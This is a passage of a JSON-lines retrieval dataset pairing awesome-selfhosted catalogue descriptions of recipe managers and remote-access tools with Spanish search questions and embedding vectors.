0.06247, -0.02116, -0.01672, -0.07717, -0.02503, 0.0641, 0.06918, -0.00719, 0.09868, -0.00083, -0.02617, 0.02825, 0.09831, -0.1023, -0.09721, 0.09262, -0.04085, 0.00769, -0.0062, 0.04183, -0.01127, -0.01971, 0.03496, -0.01872, -0.0048, -0.09594, -0.03871, 0.02277, -0.06324, 0.05735, -0.00198, -0.05017, -0.00069, 0.11018, -0.06544, 0.05836, -0.022, -0.01685, -0.04415, 0.13256, 0.01502, -0.05748, -0.00403, 0.05359, 0.01403, -0.02516, -0.03923, -0.00621, -0.00795, -0.03539, -0.04865, -0.01333, -0.05122, 0.04341, 0.02685, -0.08293, 0.09583, -0.07823, -0.02351, -0.09402, 0.00588, 0.0156, -0.04866, 0.03091, 0.07952, 0.04124, -0.02598, 0.03907, -0.0359, -0.03947, -0.01524, 0.0499, -0.01295, -0.0323, -0.00225, 0.07307, 0.06372, -0.0742, 0.06747, -0.05111, 0.08875, 0.03925, 0.00852, 0.02289, 0.05578, -0.04619, -0.03797, -0.10339, 0.00926, -0.00244, 0.00939, -0.03277, -0.04446, 0.01565, -0.0315, -0.03196, -0.04415, -0.08055, -0.02034, -0.01999, -0.0099, 0.02428, 0.0116, 0.05403, 0.02974, -0.06383, 0.00143, 0.00191, -0.05529, -0.01478, 0.01627, -0.05021, -0.001, 0.0115, 0.07903, -0.04204, 0.05278, 0.07625, -0.00958, 0.01386, 0.00436, 0.07568, 0.02709, -0.03683, 0.08351, -0.08084, -0.00751, 0.007, 0.02521, -0.04064, -0.02776, 0.00353, 0.03424, 0.01012, 0.0565, 0.01927, 0.01185, 0.06989, 0.00024, 0.00996, 0.03818, 0.0035, 0.01618, -0.00132, -0.00902, -0.02922, 0.01548, -0.02411, 0.05797, -0.03675, -0.07573, 0.01423, 0.01718, 0.05655, 0.04706, -0.02335, -0.021, -0.07541, 0.0183, -0.03808, -2e-05, -0.05114, 0.02878, 0.04949, 0.07437, -0.03697, 0.00914, -0.03559]} +{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Tamari β€” Recipe manager web app with a built-in collection of recipes. Organize by favorites and categories, create shopping lists, and plan meals [GPL-3.0, Docker/Python]. Vanilla Cookbook β€” Recipe manager designed with complexity under the hood, keeping the user experience as uncluttered, simply vanilla as possible [GPL-3.0, Docker/Nodejs]. What To Cook? β€” Get a recipe to cook today, based on the ingredients you have at home [AGPL-3.0, Docker].", "indexar": "cual es una alternativa libre a las aplicaciones de recetas tradicionales", "v": [0.10946, 0.12205, -0.01622, -0.095, 0.00535, 0.03331, 0.0506, -0.04725, -0.09318, 0.02967, -0.02573, -0.14211, -0.06114, 0.00438, 0.08901, -0.03946, 0.08469, -0.10572, 0.16691, -0.01836, -0.07878, 0.01275, -0.21859, -0.02686, -0.06362, -0.04981, 0.07982, 0.00848, -0.05587, 0.02276, 0.01233, 0.03062, 0.10729, -0.092, -0.1529, 0.01606, 0.06166, -0.04186, -0.1059, -0.10263, 0.07318, -0.09397, -0.07266, 0.05098, -0.08739, -0.01337, -0.02737, 0.03483, -0.07547, 0.00749, -0.05328, -0.06753, 0.00697, 0.08894, 0.05357, -0.04975, 0.09824, -0.09137, -0.06427, 0.01728, -0.05157, 0.05638, 0.07052, 0.01238, 0.05545, -0.05363, -0.0285, 0.05961, -0.0457, 0.04203, 0.04957, 0.12257, -0.00837, -0.01084, -0.07579, 0.10982, -0.07857, 3e-05, -0.02662, 0.00643, -0.01442, -0.09458, 0.00205, 0.04646, -0.05406, -0.0909, 0.11675, -0.10239, 0.02502, -0.02803, 0.04399, -0.00292, -2e-05, 0.1035, 0.07435, -0.1247, 0.05929, 0.09451, 0.04226, 0.22979, 0.05394, -0.00472, -0.09111, -0.02957, -0.04912, -0.04795, 0.05426, -0.02314, -0.04467, 0.01563, -0.04296, -0.03132, 0.03811, 0.09188, -0.01368, 0.01761, -0.0484, -0.04795, -0.01407, -0.00633, -0.08999, -0.02087, -0.04368, -0.04018, 0.0483, 0.01358, 0.00919, 0.11673, -0.07158, 0.05626, 0.05312, -0.05533, -0.07285, -0.0471, -0.09271, -0.05151, 0.14305, -0.04843, 0.01501, -0.03885, 0.02335, 0.03883, 0.00339, -0.0898, 0.0737, 0.01018, 0.04062, -0.02647, 0.01492, -0.04719, -0.07459, -0.02987, -0.07173, 0.10772, -0.05316, 0.02115, -0.09378, -0.06309, -0.08602, 0.13697, 0.01381, -0.00927, -0.07368, -0.06196, -0.07488, -0.06962, 0.02033, -0.01629, 0.01928, 0.03601, 0.00874, 0.09233, 0.01978, -0.08667, 0.0451, -0.06071, -0.01982, -0.08639, 0.05953, -0.04456, -0.06745, 0.00863, -0.07897, -0.0042, 0.06727, -0.06438, 0.00319, 0.02578, 0.03833, 0.06398, -0.06449, 0.03604, -0.07224, -0.05153, -0.0256, 0.04417, 0.03005, -0.04692, -0.08224, -0.03813, -0.06772, 0.00345, -0.05293, -0.06711, -0.01308, 0.05877, -0.04059, 0.05286, -0.02855, 0.09398, 0.025, 0.0149, 0.06894, 0.04216, -0.03755, -0.05608, 0.00753, -0.042, -0.00145, 0.00846, 0.03335, -0.01836, 0.00803, 0.01687, -0.01837, 0.03747, 0.0532, 0.04486, -0.04159, -0.00446, 0.01067, -0.02742, -0.04403, -0.00853, 0.04365, 0.02995, -0.01381, -0.02862, -0.03857, -0.02186, 0.00892, 0.07265, 0.00095, -0.01572, -0.05562, 0.00694, -0.0918, -0.03317, -0.01033, -0.02761, -0.06328, 0.08576, 0.0915, 0.00685, 0.0244, -0.04608]} +{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Cardea β€” SSH bastion server with access control, session recording, and optional TPM-backed key protection [EUPL-1.2, Go/Docker]. Engity's BifrΓΆst β€” Highly customizable SSH server with several ways to authorize a user and options where and how to execute a user's session [Apache-2.0, Go/Docker]. Firezone β€” Secure remote access gateway that supports the WireGuard protocol. It offers a Web GUI, 1-line install script, multi-factor auth (MFA), and SSO [Apache-2.0, Elixir/Docker]. Guacamole β€” Clientless remote desktop gateway supporting standard protocols like VNC and RDP [Apache-2.0, Java/C]. MeshCentral β€” Run your own web server to remotely manage and control computers on a local network or anywhere on the internet [Apache-2.0, Nodejs]. ShellHub β€” Modern SSH server for remotely accessing linux devices via command line (using any SSH client) or web-based user interface (alternative to sshd) [Apache-2.0, Docker]. Sshwifty β€” Sshwifty is a SSH and Telnet connector made for the Web [AGPL-3.0, Go/Docker].", "indexar": "quΓ© herramienta sirve para acceder remotamente a un servidor Linux desde el navegador sin instalar clientes?", "v": [-0.02223, 0.02312, -0.2303, -0.23357, 0.01377, -0.16369, -0.09019, -0.02993, -0.04931, -0.01886, -0.10005, -0.11176, 0.0591, -0.1197, 0.1129, 0.02333, 0.06906, -0.14685, 0.03463, -0.00296, -0.02286, 0.07683, -0.0281, -0.00275, -0.04586, 0.01232, 0.08118, -0.1179, -0.05304, -0.02622, -0.02561, -0.06496, 0.02223, 0.03423, -0.058, -0.02102, 0.02338, 0.05335, 0.03439, 0.05673, 0.12954, -0.0017, -0.04057, 0.04787, -0.026, -0.08015, 0.05528, -0.08436, 0.07757, -0.05223, -0.02409, -0.06778, -0.13841, -0.04544, 0.01052, 0.00528, 0.2177, -0.19029, 0.12505, -0.05658, -0.15212, 0.05277, -0.0553, 0.00755, 0.05502, -0.0477, -0.0478, -0.05586, -0.09182, -0.00924, -0.07776, 0.046, 0.00544, -0.0462, 0.01089, 0.06907, -0.05661, 0.04517, 0.0775, -0.00415, 0.09997, 0.00192, -0.06668, -0.00014, -0.11327, -0.17279, 0.05557, 0.02608, 0.00856, -0.00296, 0.09498, 0.10449, -0.03577, 0.0794, 0.046, -0.05746, 0.13923, -0.05025, 0.00831, -0.04102, 0.03014, 0.01805, -0.04043, 0.12514, 0.0015, 0.0081, 0.07689, -0.09847, -0.02441, -0.06046, 0.0748, -0.01041, -0.03019, -0.02279, -0.04728, -0.01792, -0.01756, -0.04538, -0.03247, 0.01616, -0.08015, -0.01853, -0.0555, 0.02672, -0.01579, -0.02451, 0.00024, 0.0896, -0.01484, -0.08914, 0.03598, -0.12589, -0.04033, 0.05922, -0.04462, 0.03136, 0.03089, -0.15382, -0.04682, -0.04484, 0.04242, 0.02153, -0.03129, -0.01578, 0.14607, -0.02258, 0.05094, -0.055, -0.0502, -0.04496, 0.01939, -0.05584, -0.04583, -0.00138, -0.11021, -0.01488, -0.01553, -0.04226, -0.05551, 0.04031, -0.00489, -0.03741, 0.08507, 0.05553, -0.0225, -0.04749, -0.06035, 0.02505, 0.11474, 0.08083, -0.01671, 0.05405, 0.02457, -0.07477, 0.01025, -0.06064, -0.00874, -0.04916, 0.00904, -0.00228, -0.03477, 0.00222, -0.00931, -0.0234, -0.03143, -0.03555, -0.01973, -0.02819, -0.03062, 0.0316, 0.02833, 0.02377, -0.0763, -0.02225, 0.05618, -0.01308, -0.07857, -0.05699, -0.0063, -0.00023, -0.06833, -0.02547, -0.01692, -0.04102, 0.05594, 0.02598, -0.02243, 0.01158, -0.01423, 0.05248, 0.01594, -0.02048, 0.06105, -0.01512, 0.03081, -0.02633, 0.05282, -0.02577, 0.01058, 0.00345, -0.01684, -0.02816, 0.02909, -0.01423, -0.00269, 0.01403, 0.04816, 0.01373, 0.01183, -0.02101, 0.01049, -0.00692, -0.0364, -0.00412, 0.01517, -0.04633, 0.04647, -0.02541, -0.03703, -0.03315, -0.02339, 0.09768, 0.00924, -0.06872, -0.04153, -0.07336, -0.03517, -0.01504, -0.03228, -0.06106, -0.06149, -0.01122, 0.05603, -0.03215, -0.01284, 0.02347]} +{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Cardea β€” SSH bastion server with access control, session recording, and optional TPM-backed key protection [EUPL-1.2, Go/Docker]. Engity's BifrΓΆst β€” Highly customizable SSH server with several ways to authorize a user and options where and how to execute a user's session [Apache-2.0, Go/Docker]. Firezone β€” Secure remote access gateway that supports the WireGuard protocol. It offers a Web GUI, 1-line install script, multi-factor auth (MFA), and SSO [Apache-2.0, Elixir/Docker]. Guacamole β€” Clientless remote desktop gateway supporting standard protocols like VNC and RDP [Apache-2.0, Java/C]. MeshCentral β€” Run your own web server to remotely manage and control computers on a local network or anywhere on the internet [Apache-2.0, Nodejs]. ShellHub β€” Modern SSH server for remotely accessing linux devices via command line (using any SSH client) or web-based user interface (alternative to sshd) [Apache-2.0, Docker]. Sshwifty β€” Sshwifty is a SSH and Telnet connector made for the Web [AGPL-3.0, Go/Docker].", "indexar": "con quΓ© puedo montar un acceso seguro al ordenador de mi casa con autenticaciΓ³n multifactor y una interfaz web fΓ‘cil de usar?", "v": [0.02806, 0.12934, -0.16859, -0.09305, -0.03084, -0.01842, -0.07863, 0.02763, -0.18475, -0.03674, -0.08801, -0.06424, -0.04055, 0.04026, 0.0464, -0.00307, 0.13093, -0.10961, -0.02117, 0.03516, 0.0971, -0.05683, -0.12234, -0.08481, -0.04814, 0.00399, 0.06545, 0.01732, -0.08441, 0.02658, 0.05009, 0.07486, 0.08555, 0.01451, -0.05506, -0.10249, 0.02124, 0.07695, 0.11481, -0.02255, 0.09284, 0.03043, -0.10785, 0.07287, 0.10691, 0.03699, -0.01001, -0.12897, 0.00651, 0.00918, -0.01969, -0.16973, -0.11314, -0.00057, -0.08342, -0.06294, 0.16133, -0.08604, 0.16493, -0.00547, -0.12885, 0.10317, -0.04994, 0.11823, 0.0089, -0.08095, -0.05687, 0.07706, -0.00639, 0.02049, -0.04662, -0.01818, -0.02492, -0.00788, -0.00653, 0.0147, -0.03549, -0.07964, 0.18432, 0.0882, 0.04751, -0.02427, -0.02624, 0.00985, -0.02061, -0.05853, 0.0411, -0.10145, 0.01504, -0.09361, 0.0582, 0.02171, 0.0055, -0.01885, 0.01866, -0.12032, 0.08988, 0.1083, -0.04549, -0.07755, 0.02579, -0.05364, -0.00503, 0.18107, -0.00319, -0.03912, 0.02239, -0.01529, -0.07381, -0.06422, 0.02662, 0.04215, -0.13468, -0.0376, -0.06301, -5e-05, -0.02514, -0.01512, -0.04175, -0.09778, -0.04577, 0.00792, 0.079, 0.0302, -0.05134, -0.0024, 0.08688, 0.07284, -0.088, -0.02524, -0.02515, -0.08769, -0.06893, -0.09654, 0.0171, 0.04067, -0.11426, -0.12522, 0.02266, -0.02655, 0.07836, 0.06976, -0.02145, -0.05054, -0.01754, 0.05073, -0.00921, -0.01678, -0.15381, 0.02593, 0.00142, 0.05363, 0.02216, 0.01207, -0.01518, 0.04204, 0.02787, 0.00592, -0.0125, 0.01852, -0.07824, 0.0858, -0.00313, 0.02051, -0.00159, -0.00034, -0.04609, -0.03384, 0.02006, 0.01878, -0.03583, 0.11253, 0.02911, -0.06894, 0.04459, 0.00861, -0.0619, -0.03399, -0.05035, -0.06112, -0.02431, 0.03927, -0.02395, 0.02838, -0.04301, 0.02064, 0.00667, 0.05102, -0.04816, 0.00174, -0.03945, 0.05277, -0.01997, 0.0735, 0.0654, -0.01534, -0.05015, -0.06004, 0.05378, -0.0095, -0.0454, -0.02188, -0.00711, -0.03685, 0.07745, 0.04415, -0.03052, -0.01405, 0.01407, 0.07987, -0.00996, -0.03937, 0.0788, 0.00759, -0.01686, -0.00524, 0.02252, 0.01013, 0.00717, 0.03116, 0.07813, 0.0293, -0.01627, 0.02083, 0.04535, -0.04691, 0.00515, -0.06058, 0.00426, 0.00153, -0.03034, -0.02498, -0.00602, -0.00609, 0.02377, 0.01052, 0.02338, -0.02874, -0.06885, 0.01919, 0.00777, 0.07011, 0.04837, -0.0397, -0.04699, -0.0144, -0.10679, 0.03274, -0.04455, -0.04855, -0.05798, -0.04253, -0.0012, -0.00284, -0.03112, 0.03274]} +{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Cardea β€” SSH bastion server with access control, session recording, and optional TPM-backed key protection [EUPL-1.2, Go/Docker]. Engity's BifrΓΆst β€” Highly customizable SSH server with several ways to authorize a user and options where and how to execute a user's session [Apache-2.0, Go/Docker]. Firezone β€” Secure remote access gateway that supports the WireGuard protocol. It offers a Web GUI, 1-line install script, multi-factor auth (MFA), and SSO [Apache-2.0, Elixir/Docker]. Guacamole β€” Clientless remote desktop gateway supporting standard protocols like VNC and RDP [Apache-2.0, Java/C]. MeshCentral β€” Run your own web server to remotely manage and control computers on a local network or anywhere on the internet [Apache-2.0, Nodejs]. ShellHub β€” Modern SSH server for remotely accessing linux devices via command line (using any SSH client) or web-based user interface (alternative to sshd) [Apache-2.0, Docker]. Sshwifty β€” Sshwifty is a SSH and Telnet connector made for the Web [AGPL-3.0, Go/Docker].", "indexar": "cuΓ‘l es la alternativa libre a sshd que me permite gestionar mΓ‘quinas remotas mediante una sola lΓ­nea de comando?", "v": [0.05128, -0.00317, -0.15831, -0.10675, -0.07349, -0.11173, -0.07928, -0.09735, -0.14237, 0.00491, -0.16014, -0.07036, 0.18736, -0.10048, 0.15685, 0.04008, 0.07723, -0.02652, -0.01459, -0.00269, -0.04035, -0.03946, 0.04531, -0.05148, -0.00603, -0.05199, 0.18382, -0.04295, -0.15923, -0.05012, 0.00597, 0.03018, 0.10218, -0.01751, -0.01135, 0.02275, -0.04618, 0.13184, 0.09397, 0.07232, -0.04615, -0.02699, -0.15325, 0.02015, 0.18243, -0.15765, 0.02985, 0.0145, 0.01533, 0.06033, -0.12313, -0.05259, -0.06781, 0.03272, 0.02022, -0.03098, 0.20785, -0.05752, 0.0279, -0.03131, -0.10819, -0.03892, 0.00965, 0.08545, 0.00911, 0.0061, -0.02686, -0.11145, -0.10332, 0.07529, -0.02816, -0.00674, -0.02372, 0.02, 0.01429, -0.01198, -0.04356, 0.07532, 0.05091, -0.05155, -0.00028, -0.05935, -0.07998, 0.00858, -0.03378, -0.09993, -0.00913, -0.04983, 0.00764, 0.00272, 0.03926, -0.00817, 0.03064, -0.00907, 0.06721, -0.00872, 0.00139, 0.03321, 0.0362, -0.02963, 0.02568, 0.03981, -0.10903, 0.13896, -0.01347, 0.02724, 0.0631, -0.04369, -0.01823, 0.0194, 0.03595, -0.04146, 0.06482, -0.03633, -0.07219, 0.00407, -0.03483, -0.04457, -0.01377, -0.03553, -0.08676, -0.03949, 0.06071, -0.01305, 0.10709, -0.02635, -0.00907, 0.06217, 0.02612, 0.00713, 0.00014, 0.01342, 0.00121, -0.11408, -0.04346, 0.09323, 0.02052, -0.06656, -0.05524, -0.1545, -0.02448, 0.09901, -0.03383, -0.02521, 0.08796, -0.05573, 0.01723, -0.16375, -0.01332, 0.00078, 0.02499, 0.00062, -0.05225, 0.10935, -0.04869, 0.07934, -0.04811, -0.02639, -0.10373, 0.05616, -0.04892, -0.07296, -0.08329, 0.0706, -0.00912, -0.01364, -0.04408, -0.04124, -0.05776, -0.00311, -0.02368, 0.08646, 0.03866, 0.01244, 0.0184, -0.07708, 0.01177, -0.08675, 0.02841, 0.01381, -0.03227, 0.02831, -0.00774, -0.05935, -0.03528, 0.00086, -0.04678, 0.01476, 0.04697, 0.03695, 0.04324, 0.04312, -0.10587, -0.03414, 0.02358, -8e-05, 0.00191, -0.03133, 0.01475, -0.00988, -0.10071, 0.01704, 0.01145, -0.04368, 0.02638, 0.00273, -0.03897, 0.0677, 0.00709, 0.01582, 0.07012, -0.0274, 0.06823, -0.04311, -0.05767, -0.01347, -0.01457, -0.07423, -0.03023, -0.01789, 0.00878, -0.02992, 0.02901, 0.03898, 0.01367, 0.04531, 0.00332, 0.05827, 0.03639, -0.02112, -0.01663, -0.00415, 0.01835, 0.00205, 0.03296, -0.02688, 0.0429, -0.0171, 0.00851, -0.01315, 0.01472, 0.0844, -0.03267, -0.05237, -0.06802, -0.03956, -0.10166, 0.01915, -0.06195, -0.03629, -0.07156, -0.01632, -0.01373, 0.0129, -0.02375, 0.01112]} +{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Termix β€” Clientless web-based server management platform with SSH terminal, tunneling, and file editing capabilities [Apache-2.0, Docker]. Warpgate β€” Fully transparent SSH, HTTPS, Kubernetes, MySQL and Postgres bastion/PAM that doesn't need additional client-side software [Apache-2.0, Rust/Docker].", "indexar": "que programa sirve para acceder a servidores sin instalar nada en el cliente?", "v": [-0.03782, 0.07326, -0.21639, -0.2029, 0.06343, -0.17905, 0.01302, -0.11602, -0.11115, -0.04233, -0.11208, -0.10286, 0.01317, -0.17136, 0.03245, -0.00719, 0.11617, -0.14198, 0.13146, 0.13149, 0.0449, 0.08883, 0.02855, -0.00634, -0.13199, 0.1049, 0.05556, -0.10816, -0.07852, -0.02353, 0.0557, -0.13986, 0.02017, -0.07621, 0.02826, -0.06154, -0.03919, 0.02691, -0.04032, 0.06194, 0.1529, 0.00972, 0.00529, 0.02813, 0.05445, -0.0358, 0.09657, -0.05688, 0.07247, 0.02922, -0.08139, -0.0151, -0.06348, -0.07622, -0.01544, -0.03443, 0.02316, -0.13201, 0.01831, 0.01552, -0.08379, 0.12686, -0.02009, 0.05819, 0.08924, -0.02715, 0.07614, 0.00106, -0.04848, -0.03458, -0.09945, 0.0058, 0.00997, -0.12011, -0.02786, 0.05613, -0.04036, -0.04685, 0.07996, 0.01134, 0.04092, 0.0086, -0.03874, -0.0059, -0.10464, -0.06336, 0.04482, 0.00949, -0.02204, -0.00252, 0.04219, 0.10543, -0.0012, 0.10052, 0.03683, -0.10028, 0.16642, -0.07745, 0.0233, 0.04478, 0.05837, -0.03388, -0.00498, 0.09016, -0.08993, 0.03908, 0.10303, -0.10303, -0.01849, -0.03588, 0.0138, -0.01207, -0.05409, -0.01458, -0.05648, -0.06223, 0.01788, -0.05256, -0.01754, 0.05633, -0.12116, 0.00466, 0.02627, 0.08375, 0.0096, -0.02473, 0.04006, 0.04964, -0.03517, 0.02274, 0.03342, -0.01889, -0.01921, 0.04888, -0.07243, -0.10444, 0.05545, -0.03697, -0.04092, -0.02363, 0.0073, 0.07209, -0.00868, 0.00121, 0.04881, -0.0196, 0.08809, -0.04499, -0.01245, -0.00535, 0.00414, -0.00723, -0.07082, 0.04841, -0.09481, -0.065, 0.06685, -0.05628, -0.03872, 0.02588, -0.00229, 0.03364, 0.02278, 0.04043, 0.03316, -0.02265, -0.07232, 0.0262, 0.13397, 0.10553, -0.04178, 0.03769, 0.0238, -0.09165, -0.0063, 0.01164, -0.04662, -0.03891, 0.10004, 0.03915, -0.05623, 0.03037, 0.02957, 0.03692, -0.06721, -0.06118, -0.08306, -0.0151, -0.03496, -0.00508, 0.01751, -0.01606, -0.09066, -0.00067, 0.02026, -0.02813, -0.0668, -0.01251, -0.04284, -0.04965, -0.03301, -0.00526, -0.02751, 0.00319, 0.06758, 0.07938, -0.02184, 0.05232, 0.01174, 0.11015, 0.01044, -0.01945, 0.05923, -0.01452, 0.01103, -0.02935, 0.04595, 0.01219, 0.03345, 0.03664, -0.0092, -0.02062, 0.01029, 0.02646, -0.03316, -0.03208, 0.03151, 0.01333, 0.02742, 0.02413, -0.04118, -0.01727, -0.00409, -0.01452, -0.0006, -0.04924, 0.03247, -0.02002, -0.03163, -0.10435, 0.00994, 0.09338, 0.00621, -0.05531, -0.01839, -0.0409, -0.03034, -0.02333, -0.01665, -0.00865, -0.02346, 0.01452, 0.03137, -0.02028, 0.04159, 0.02502]} +{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Termix β€” Clientless web-based server management platform with SSH terminal, tunneling, and file editing capabilities [Apache-2.0, Docker]. Warpgate β€” Fully transparent SSH, HTTPS, Kubernetes, MySQL and Postgres bastion/PAM that doesn't need additional client-side software [Apache-2.0, Rust/Docker].", "indexar": "con que puedo usar un terminal web para gestionar mis servidores de forma segura?", "v": [-0.08521, 0.00108, -0.22013, -0.25054, 0.01807, -0.06601, -0.10552, -0.09708, -0.03567, -0.01646, -0.17146, -0.01422, 0.12142, -0.02097, 0.0183, 0.0277, 0.08194, -0.10675, 0.08429, 0.05333, 0.05564, 0.01697, 0.04246, -0.01714, -0.05363, 0.06585, 0.04212, -0.13541, -0.07387, -0.0627, 0.0011, -0.05339, 0.10346, -0.06553, -0.02682, 0.06036, -0.10692, 0.13211, 0.02835, 0.09875, 0.00135, 0.00561, -0.09052, 0.03138, 0.07907, 0.02752, 0.06281, -0.15775, 0.07041, -0.05139, -0.09213, -0.11757, -0.13185, 0.00685, -0.06287, -0.02593, 0.06675, -0.1324, 0.06477, -0.00197, -0.14668, 0.05362, -0.03175, 0.14518, 0.05776, -0.01623, 0.01656, 0.01874, -0.12967, 0.01702, 0.01421, 0.04039, -0.01538, 0.04475, 0.0523, 0.01064, -0.06919, 0.05785, 0.15399, 0.12476, -0.01274, 0.07065, -0.06532, 0.00656, -0.11833, -0.12406, -0.04909, 0.0267, 0.00165, 0.007, 0.06644, -0.02844, -0.04467, -0.03684, -0.0738, -0.05373, -0.00423, -0.04302, -0.06706, -0.06414, 0.07096, 0.08549, -0.0022, 0.09116, -0.01557, 0.03028, 0.06593, -0.07048, 0.08512, -0.11701, 0.00939, -0.056, -0.01855, 0.0112, -0.0768, 0.03158, -0.0037, -0.00525, 0.01597, -0.01616, -0.02956, -0.05382, 0.06506, 0.02328, 0.13161, -0.00331, 0.05137, 0.06896, 0.01499, -0.03342, -0.03415, -0.0652, -0.04718, -4e-05, -0.05317, -0.00017, 0.04303, -0.08739, -0.0114, -0.01295, -0.06238, 0.07223, -0.07479, 0.01918, 0.10095, -0.01873, 0.00545, -0.00303, -0.05224, -0.07542, 0.03979, -0.05455, -0.04871, -0.02158, -0.09904, 0.02142, 0.03282, -0.04487, -0.11915, 0.0465, -0.02425, -0.02414, -0.02444, 0.13692, 0.02583, 0.0066, -0.06201, 0.03185, 0.00428, -0.00381, 0.04673, 0.02227, 0.04411, -0.03341, 0.04611, -0.03191, -0.12637, -0.02967, 0.0565, -0.00069, 0.01202, -0.00647, -0.02419, 0.05175, -0.05621, -0.06103, -0.00925, 0.04493, -0.04503, 0.06954, 0.03747, 0.05711, -0.00511, 0.06263, 0.0474, -0.03143, 0.01366, -0.01631, -0.03566, -0.0289, -0.00354, -0.01815, 0.02112, -0.02671, 0.03454, 0.00794, -0.1113, 0.04801, 0.0472, 0.03142, 0.00403, 0.01125, 0.08502, -0.03787, 0.00806, -0.051, 0.0163, 0.00675, -0.02778, -0.01333, -0.00687, -0.00413, -0.00984, 0.03194, 0.01452, 0.02606, 0.00075, 0.00504, 0.01222, -0.01074, -0.00301, 0.03339, -0.01141, 0.00825, -0.02706, -0.05677, 0.036, -0.05857, -0.05744, -0.05371, -0.01135, 0.09534, -0.00455, -0.01341, -0.02499, -0.07508, -0.07974, 0.02257, -0.06151, -0.00626, -0.01385, -0.02188, 0.03364, 0.02836, -0.05379, 0.01853]} +{"tipo": "pregunta", "herramienta": "Remote Access", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Remote Access", "tema": "remote access", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Remote Access: Termix β€” Clientless web-based server management platform with SSH terminal, tunneling, and file editing capabilities [Apache-2.0, Docker]. Warpgate β€” Fully transparent SSH, HTTPS, Kubernetes, MySQL and Postgres bastion/PAM that doesn't need additional client-side software [Apache-2.0, Rust/Docker].", "indexar": "cual es una alternativa libre al cliente SSH tradicional para la gestiΓ³n remota?", "v": [0.01824, -0.07816, -0.14635, -0.06022, -0.0737, -0.07075, -0.03295, -0.12711, -0.08902, 0.07769, -0.12864, -0.16302, 0.18172, -0.03881, 0.11795, -0.03963, 0.01564, -0.07447, 0.09813, 0.08666, 0.00583, -0.0199, 0.00968, -0.03025, -0.09664, -0.14194, 0.19196, -0.00561, -0.04266, 0.04303, 0.09804, -0.05491, 0.04123, -0.05247, 0.03389, 0.0468, 0.03287, 0.10418, 0.03419, -0.06624, 0.12092, -0.11749, -0.05811, 0.01817, 0.11115, -0.10588, 0.02225, 0.02204, -0.03128, 0.13214, -0.16628, -0.05184, -0.11864, -0.00227, 0.13474, 0.02946, 0.10128, -0.16638, -0.00355, -0.02825, -0.0472, 0.03847, 0.04502, 0.02553, 0.09043, -0.10021, 0.01101, -0.01605, -0.03016, 0.04849, 0.03491, -0.02561, 0.01277, 0.02634, -0.06199, 0.03973, 0.0164, 0.11414, -0.02524, -0.03049, 0.02956, -0.11235, -0.01132, 0.01587, -0.08026, -0.10928, 0.03765, -0.10455, 0.00816, 0.01647, 0.00116, -0.04898, 0.01765, 0.02724, -0.0045, -0.0841, -0.03051, -0.05185, -0.04356, 0.0809, -0.01396, 0.06842, -0.06056, 0.01558, 0.03179, -0.02129, 0.06209, -0.03266, -0.09234, 0.08336, -0.0383, 0.00545, -0.04437, 0.04188, -0.09203, -0.03576, -0.04142, -0.02569, -0.00281, 0.06764, -0.07506, -0.05044, -0.02933, -0.04027, 0.01915, 0.02324, 0.02951, 0.11263, -0.0424, 0.00242, 0.03567, -0.0387, -0.03914, -0.08368, -0.01787, -0.02788, 0.09014, -0.04423, 0.02315, -0.03499, -0.07628, -0.02096, 0.01862, -0.02978, 0.12815, -0.10589, 0.06796, -0.08396, -0.01805, 0.03069, -0.04737, -0.03, -0.05936, 0.0847, -0.05808, 0.02829, -0.08475, -0.06847, -0.05894, 0.11884, -0.00871, -0.0911, 0.07208, 0.00258, -0.03035, -0.05576, -0.02403, -0.01446, -0.05058, 0.00465, -0.01018, 0.05585, 0.00857, -0.06016, 0.02061, -0.06623, -0.0287, -0.10361, 0.06835, -0.03834, -0.02246, 0.00874, -0.09139, 0.0275, 0.0687, -0.04887, -0.03965, 0.01816, 0.0276, -0.02609, -0.01476, 0.00469, -0.0825, -0.05738, -0.01373, 0.03344, 0.00844, -0.03403, -0.03199, -0.01594, -0.08993, -0.0281, -0.01172, -0.04694, -0.01708, 0.01503, -0.02929, 0.10924, 0.04061, 0.07761, 0.04772, -0.06086, 0.09732, 0.00457, -0.02221, -0.04052, -0.00773, -0.1026, 0.04379, 0.00262, 0.01696, 0.00905, 0.03864, 0.04006, -0.04345, 0.0713, 0.03944, 0.0677, -0.01336, -0.0176, 0.0299, -0.04225, 0.01403, 0.05245, 0.01649, -0.00081, 0.00875, -0.04829, 0.00379, 0.00408, 0.03689, 0.07403, -0.0669, 0.00199, -0.03207, 0.01901, -0.1154, -0.01864, -0.04517, -0.02055, -0.05106, 0.0244, -4e-05, 0.02554, 0.02875, 0.00856]} +{"tipo": "pregunta", "herramienta": "Resource Planning", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Resource Planning", "tema": "resource 